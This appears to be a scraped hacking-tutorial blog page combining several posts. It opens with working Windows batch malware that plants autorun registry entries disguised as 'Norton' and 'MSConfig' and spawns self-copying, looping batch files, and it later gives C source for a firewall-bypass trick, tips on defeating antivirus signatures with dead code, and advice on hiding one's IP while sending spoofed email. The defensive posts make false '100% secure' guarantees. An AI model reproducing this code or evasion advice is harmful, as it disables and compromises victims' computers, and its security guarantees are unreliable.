Programme for a simple virus

creates a reg file and puts it in the registry

then it creates a file in C:\ called 2.bat

the 2.bat file copys itself into other files and opens them

each file does the same 2.bat but they EACH loop

so it keeps on opening other batches that each loop and open other batches

the only way out is to boot in safe mode.

I tried this one a couple comps and on one of them it wasnt very effective and it only opened a limited amount of files and im not sure why because i was able to crt+alt+del which i wasnt able to do on the other comps which were all winblows xp. there will be 1600 processes opening about 1600 other processes opening up another 1600 processes and so on looping on each of them

@echo off
del C:\1.reg
>>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
>>"C:\2.bat" ECHO start C:\winblows\1.bat
>>"C:\2.bat" ECHO start C:\winblows\2.bat
>>"C:\2.bat" ECHO start C:\winblows\3.bat
>>"C:\2.bat" ECHO goto 1

start 2.bat
del C:\1.reg 

Hope you like this....

Read More

How to stop virus or trojan attacks - Hacking class

     

Hello Friends I am back again with my new Hacking article " How to stop virus or Trojan attacks" from infecting your system. After previous three hacking classes about "Introduction to virus, Trojan, backdoor" and "Different types of Viruses" most of the users asked How to prevent our systems from infecting from viruses. There are several ways to protect your system from being infected. I will try to share almost all tricks. And the most important thing is that after reading this article your system will be 100% secured from all types of Virus attacks but Trojan attacks can happen because of your negligence but i will try to tell all things so that this can also  does not happen. So Guys read on and stop wasting time in removing viruses or Trojans from your computer because from now a single virus cannot enter into your system Its my Guarantee and challenge to all hackers.

If you want to know that your system is either infected by viruses and trojans then these are certain techniques to know that:
1. Your Computer might be running slow usual than normal.
2. Some programs might open without your permission.
3. System start up takes too much time to start.
4. Various Error messages appear on Screen when you open something or without opening also.
5. System registry has been disabled or folder options is missing.
6. The most important antivirus shows messages of detecting viruses time to time.
7. While scanning your system from any antivirus or anti spyware tool its showing viruses and you noticed that viruses are not deleting.
and much more...

Have you ever think about the reason why your system is got infected. What has infected your system and if its done by any of your friend How he has done it. Surely No, or in some cases you have tried to find the answer but you are not able to get proper answer. But story is different here , I will tell all the ways How your system can be Get infected and How you can protect it if its already infected How you can resolve the problem. So here are few things How your System got Infected , some might be knowing this but by some reason they have ignored them.

How a System is got Infected because to Negligence?

1. Using Cracked Versions of software specially security ones like antivirus, anti-spyware etc.
Why I have said this is the first and major cause of infection because of the following simple reason that All hackers know that general internet user public always searches for cracked versions of software's and wishes to use them for free and Hacker take benefit of them. You all now be thinking how it help hackers. We know that almost all antivirus show each and every keygen as virus or some trojan depending upon its type. Now if we all know that then how come hackers will forget this fact so what they do they attaches trojans and viruses to these files and at the time When your antivirus shows it as virus you ignores the alert and keep the keygen means trojan running.
NOTE: And Guys an important note for you all, If your antivirus doesn't show any keygen or crack as a virus then don't ever think that its not a virus but its a most dangerous thing. Why dangerous because now Hacker has used some more brain to fool you that is he has made the virus undetectable simply edit the hex code of original virus. So what is the moral of story Please don't use cracked versions.
Now you all be thinking that if we don't use the cracked versions then how we will able to get full versions of the software's. Don't worry when I am there no fear drink beer and enjoy everything for free. Its solution will be in solutions step just read article.2. Pen drive or USB drive :
The biggest cause of infection of your system is usb drives and external hard disks.
Now how a virus enters into your system using USB drives. You have connected your USB drive to your friends computer and by chance (sorry its for sure i.e 100%) your friends system is infected by virus or Trojans and its the property of Virus that it replicates itself using memory. So when you connect your USB to your friends computer your USB is now infected by virus and now when you connect this USB to your PC using the property of your Windows that it searches the files in Newly connected device and autorun the device and for doing this it loads the index of your USB file system into Memory and now if USB has virus its the property  of virus its replicates itself using system memory. Now if you are using good antivirus , your antivirus will pop warning and alert messages and some times you ignores them means your system is also infected. For USB drive virus solution keep reading article.3. Downloading things from Unknown Sites:
Most of the users searches for thing over the internet and where ever they find their desired result means file that they want they start downloading that from that site only. Now how it affects your system suppose you want to download any wallpaper say Katrina Kaif. Now hackers know the fact that Katrina has a huge fan following and user will surely going to download it. Then what they do they simply bind their malicious codes with some of files and when users download it his system is infected and he can never imagine that the virus has come from wallpaper that he has downloaded from unknown site. For its solution read on article.4. The most important one Becoming a Hacker like Me (ROFL but its truth).
Why I have mentioned this you might be clear from the above discussion. Most of the internet users always curious to know ways how can i hack my friends email account or his system for these they download all type of shit from the internet and believe me 99.9% of this shit contains viruses and Trojans that sends your information to the providers. Now I don't say that stop hacking but try to follow some basic steps to learn hacking and first of all you must know how to protect yourself from such type of fake software's. For its solution read on article.


Now after discussing the things How you system is got infected by your simple negligence. Its time You should Know How to fix them and protect your system from all types of viruses and trojans.

HOW TO STOP VIRUS OR TROJANS ??

1. Using Good Antivirus:
There is a nice misconception between the internet users that full antivirus provides better security. Ya its 100% truth but full antiviruses paid ones not the cracked ones.
There are several other solutions to them that you will get for absolutely Free and I guarantee that it will protect your system 100% just doing some little configurations.Best Free Antivirus : Avira Personal Antivirus i.e Antivir.
You can download avira for free from :
http://www.filehippo.com/download_antivir/

Now after downloading the antivirus what you have to do to make it as good as paid antiviruses.
a. Install the antivirus and update it. Note updating antivirus regularly is compulsory. Don't worry its not your work it will update itself automatically whenever update is available.
b. After Installing at the right hand top corner you will see a "CONFIGURATION" button. Just click on it now a new window will pop up.
c. Now There at left hand top you will see a click box in front of Expert is written . Click on that now you will see several things in it. Now do the following setting one by one.
1. Click on "Scanner" click on all files and set the "Scanner Priority" to high and click on apply.
2. Click on "Guard" and click on all files and click on "Scan while reading and writing" and then click apply.
3. Click on "General" Now click on select all and click on apply. In general tab only go to WMI section and click on advanced process protection and then click on apply.
4. After doing that restart your PC.
Now you have made your free antivirus an equivalent to the paid one..
Best Free Anti-Spyware: Spyware Terminator with crawler Web security toolbar.
Download It for free :
http://www.filehippo.com/download_spyware_terminator/

Install spyware terminator with web security tool bar . Now your following problems are being solved:
1. No Trojan can attack you.
2. Protection from Malicious websites and much more..
2. Solution for Cracked version Software's:
As I have mentioned earlier never download cracks and keygens directly to you system but several other methods are there while you are searching for Crack or Keygen first try to search for Serial Key if you found it then its awesome and if not what to do.
Before downloading any Crack and Keygen . Go to the Website:
http://www.virustotal.com/ 

Now copy the download link of the Keygen or crack in the URL box provided on website this website contains all the world famous antiviruses and it will scan file for you if it contains any virus just ignore that otherwise have fun with crack or Keygen.

3. Pen drive or USB drive solution:

How you can protect your system from being infected from the pen drive. Just do the following three things rest is being cared by your antivirus.
1. Turn off Auto Play Devices:
To do it Go to Start Menu--> RUN-->type gpedit.msc and press enter-->User Configuration-->Administrative templates-->System-->Turn off Autoplay--> click on enable and then select all drives.
2. Turn of Computer Browser service:
To do it Go to Start Menu--> RUN-->type services.msc and press enter-->then Find Computer Browser service and disable it and restart your system.
3. Most important one Always scan the Pen drive or External hard drives after connecting them.

4.Downloading things from Unknown Sites Solution:

The solution of this problem is already provided Web browser Security toolbar will help you in surfing only secured and genuine websites and if you want to visit and download Virus Total will help you to identify the file whether its infected or not.

5. Now for Hacker like me i.e Method to use or test Hack tools.

Why I have mentioned this is simply because Hackers always take benefit of these noobish tricks that they attach viruses with files and name them as hack tools . So avoid them if you are too curious like me. Then there are several ways to Handle it.
1. Use Deep Freeze on C drive: For testing Hack tools always use deep freeze as after the next restart your system will be at same position as it was previous.
2. Install Virtual Box and over virtual box install another Windows and test all hack tools using virtual windows. This will protect your system from being infected. Also It will give you more knowledge about handling the viruses and other situations like when something wrong is done what i have to do.
3. Create two to three fake email ID's and use them for testing Keyloggers and other fake email hacking software's.



I hope You all have liked this Article

 

                                                                               

Read More

How to remove Virus from USB Drives

One of the ways by which a virus can infect your PC is through USB/Pen drives. Common viruses such as ’Ravmon’ , ‘New Folder.exe’, ‘Orkut is banned’ etc are spreading through USB drives. Most anti virus programs are unable to detect them and even if they do, in most cases they are unable to delete the file, only quarantine it. Here are the things which you can do if you want to remove such viruses from your USB Drive


Whenever you plug a USB drive in your system, a window will appears

Don’t click on Ok , just choose ‘Cancel’. Open the Command Prompt by typing ‘cmd‘ in the run box. In the command prompt type the drive letter: and press enter . Now type dir /w/a and press enter.

This will display a list of the files in the pen drive. Check whether the following files are there or not
Autorun.inf
Ravmon.exe
New Folder.exe
svchost.exe
Heap41a
or any other exe file which may be suspicious.

If any of the above files are there, then probably the USB drive is infected. In command prompt type attrib -r -a -s -h *.* and press enter. This will remove the Read Only, Archive, System and hidden file attribute from all the files. Now just delete the files using the command del filename. example del Ravmon.exe. Delete all the files that are suspicious. To be on a safer side, just scan the USB drive with an anti virus program to check whether it is free of virus or not. Now remove the drive and plug it again. In most of the cases, the real culprit turns out to be the “Autorun.inf” file which mostly gets executed when someone clicks Ok in the dialog window which appears above. Thus the infections can spread

Disable the Autoplay feature of USB drives. If you disable the Autoplay feature of USB drives, then there are lesser chances of the virus spreading. A tool which can perform such a function is Tweak UI. Download it from here install it.

Run the program. Now you can disable the Autoplay feature of the removable drives as shown above. By following the above steps, you can keep your USB drives clean.
Tweak UI is a freeware software you can download it here:

http://www.filehippo...wnload_tweakui/

Read More

How to Bypass Windows XP Firewall using C program

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-

The information has been provided by Mark Kica.

Vulnerable Systems :-
* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

I hope you all liked It.

Read More

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an antivirus software works and detects virus. Most of you already know that what is antivirus, but have you ever tried to understand how it works and why it requires updates regularly? How antivirus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of antivirus involves two basic technologies namely:

1. Dictionary based continuous and fragmented string search

2. Suspicious activity detection (process manipulation)

 

So friends, lets start learning how an antivirus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, antivirus software searches a string by comparing the file with strings existing in virus definition's or database.

 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:

ABCDEFGHIJKLMNOPQRSTUVWXYZ

Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behaviour of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:

ABCDEFGHIJKLMNOPQRSTUVWXYZ012345

where 012345 is the string that virus has attached to the file after infection.

Now what does antivirus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.

Note: This all processing is done on binary format of codes and sometimes executable. 

Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:

0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the antivirus database so it is not detected by antivirus.

How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.

Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why antivirus needs updates regularly. Antivirus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:

1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.

2. Most tools available are already infected with keyloggers and spy trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:

The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that antivirus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then antivirus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 

The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your antivirus suggests.

Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains backdoors that make your system open for attack similar to the way you have left your house main gate open for theifs in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted freewares as alternatives for paid tools rather than using their cracked versions...

I hope you all have liked it..

 

Read More

Hacking Bank Account Information

Most people learning hacking always have a keen interest in knowing that how they can hack bank accounts of other people. But most of them find it pity much difficult such that now they have made a perception that bank account information like credit cards or debit cards or net banking passwords cannot be hacked. Its truth to an extent that hacking Banking account information and credit or debit cards passwords is most difficult and almost impossible part. Today i will discuss with you why hacking bank account information is tough and always considered as impossible task. We will also discuss the different methods that hackers use to hack bank account information nowadays.

 

I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL(Secured Sockets Layer) connection and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do a lot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information.

Below example will illustrate you how powerful the encryption method is:

• 40 bit encryption, means there are  2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption.
• 128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption.That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key.

That's a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it's all is useless to you once your system has been compromised or hacked.

Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information. Note : This is for educational purposes only( For more details read Disclosure). 

Some of them are:

1. Phishing : We have discussed phishing on this website a lot of times in tutorials like how to hack Gmail accounts password or hacking Facebook accounts and others too. But for new Guys I explain what is Phishing.  Phishing is a technique to hack password and login details of a particular website using Phish pages. Now what are Phish pages? Phish Pages are simply the fake pages that looks the original webpage. The only difference between phish page and original page is the Address bar link (for normal user) and redirection post and get method( inside source for advanced users). How to identify a fake link? Just check the address bar URL for a fake page or Phish page it will be showing different URL than the original URL. Also if you want that everything is done automatically then install a Web security tool bar in your browser (AVG and Crawler web security tool bars are good choices) as it detects the phishing automatically and do not allows you to visit Phishing Pages.

2. Trojans: Trojans are type to viruses that steals your information. It can be in many forms like Keyloggers or RAT's( remote administration tools). What a keylogger do is that it monitors all the keys that you have pressed from your physical keyboard and stores them in form of a log and send these details to hackers. RAT's are advanced form of Keyloggers that remotely monitors all your activities where keylogger is simply a functionality. Using RAT hacker can connect to your system anonymously i.e. without your information when you are online. RAT's have a huge list of functionality and these are best type of hacking tools available in the market. Now How you will protect yourself from Keyloggers? Just keep your antivirus updated and install Keyscramber that encrypts your keystrokes. Now why i haven't mentioned RAT there is because once the RAT enters your system you cannot do anything other than formatting your system. So RAT's attack only can be prevented before they enters in your system. For preventing from RAT's Please do not download any software or cracks or keygens online. Also avoid downloading freewares from new websites use certified websites only like CNET, filehippo etc.. Also please avoid testing fake hack tools (recommended for hackers) because most hacking tools have keylogger and RAT's attached to them. Test it under secured conditions like on Virtual Users. Means install virtual operating system user Virtual PC or Virtual Box and then test them there.

3. Session Hijacking: Most of us uses Wireless Networks to access the internet and data flow in form of packets and channels. And we know that Wireless are easier to hack as they have very weak encryption. So Hackers hack the wireless networks and using session Hijacking they take control of the internet data transfer and redirects the user from original path to their path. Means suppose you are visiting Google or Gmail or Facebook, then hacker when get access then he can redirect you to any of the page and capture you account details. Packet sniffing is another way to hack the account information and credentials using the wireless networks where Hackers captures packets and decrypt these encrypted information to get the information in form of plain text. Now how you will prevent this? Its also pity simple to prevent this, you need to hide you SSID and BSSID from being discovered by the other networks. Just leave the SSID or BSSID empty for that. Now hacker will not be able to discover your wireless router so he will not been able to hack it.

Read More

Email spoofing Hacking class

Hi friends, After the article about SMS spoofing, today i will share with you basic idea about What is email Spoofing? How email spoofing works? What are the different ways to send spoofed emails? Can we detect spoofed emails or not?   In my later hacking class tutorials i will explain you how to send spoofed emails using email spoofing tools or by simply web applications. So Let's start from very basic..

What is Email Spoofing? 

Email spoofing refers to the process of sending an email message from one source, but making it appear as though the email was sent from a different source. For example, an email originates from user@domain.com but it appears to be from email@address.com. Another method of spoofing is to make the message appear to come from an unknown user within your domain name. For example, the message appears to be from support@yourdomain.com.
This does not mean that your email account was compromised. It means that the sender has fooled the mail client into believing the email originated from a different address.
This is usually done for malicious reasons, either to distribute unsolicited email or to distribute email viruses. Unfortunately, there is no real way to prevent spoofing from occurring. If you receive an email that has questionable content, it is recommended to delete the email message or use an antivirus program to scan the message before opening it.

I will recommend users to read the following article to know about How email works:

How Email Works tutorial

How Does Email Spoofing Work?

 Basically, email spoofing alters the email header to make it appear as though it originated from a different source address. This is possible due to the simple mail transfer protocol (SMTP) not supporting any type of sending authentication. Originally, email spoofing was used for legitimate reasons when someone wanted to send mail appearing to be from their email address when logged on to a network that was not their own. Nowadays, it is commonly used for sending spam or malicious mails means for sending viruses or phishing page links or simply spreading the botnets. The email fields can be edited in many email clients and automated spam and hacker tool kits that are currently available in the market or you can also also edit them manually if you know little bit of programming and hacking.

  

Why do People Spoof Email?

Email is primarily spoofed for one of two basic reasons: 

1 – Spam means for Email marketing or spreading a message to several users.

2 – To conduct a phishing or spear phishing attack.  

If you want to learn more about phishing then i will recommend you to read this article:

How to hack Gmail accounts step by step

Spammers will spoof the “from” field many times in order to hide their identity from the email recipients. The message body will have advertisements, or links to offers the spammers are trying to sell to the recipients. They change the “From” field in the email in order to make it harder to determine their identity and avoid complaints from the end-user. 

Those who spoof email for malicious intent are simply called Crackers and they typically do so as part of a phishing attack that is for sending phishing page links. They will spoof the email to be from someone else on the same domain as the receiver. In a spear phishing attack, the email may be changed to be from a legitimate friend or co-worker of the person receiving the email. This results in a greater possibility of the targeted person opening the email and falling victim to malware or spyware attack.

What are the Techniques to Spoof Email?

Although it is straight forward to change the “From” field in an email header, the email can still be traced to the sender. But most of  the major ISP maintain “black lists” to ban known senders of spam from sending email traffic to users on their network(s). As a result, spammers have now evolved to using specialized software to create a random sending email address. These email addresses will rarely be active or used for a second time. 

Another technique used by those conducting spear phishing attacks is to hack the account password(s) for one or more people in the organization or some normal victim. Once its hacked, the emails in the address book are used to conduct additional attacks by placing those in the “From” field in email making them to appear to be legitimate. This same technique is also used by email worms(botnets) to self-propagate through unsuspecting users opening infected email sent by the respective worm.

Can Spoofed Emails be Detected?

Now a major question arises that can we trace such activities that is email spoofing. Answer is simply no if user is smart enough that is he has used a proxy server while sending the spoofed email and answer is Yes if a novice hacker has send it without spoofing his IP address.

I would recommend you to read this article to hide your IP and remain anonymous while sending emails and performing such hacking activites:

How to Hide your Privacy Online using Super Hide IP.

Many people mistakenly believe that sending spoofed email The IP address used to send an email is logged and is traceable. This address can then be used to cross-reference with the ISP DHCP records to determine who sent the email. If you are simply trying to trick your sibling or friends, it will appear to be from the “faked” email address. This is why spammers and hackers will not send spoofed email from their own IP address(es), instead routing the spam through other destinations before sending it to the desired recipients.

                    

Read More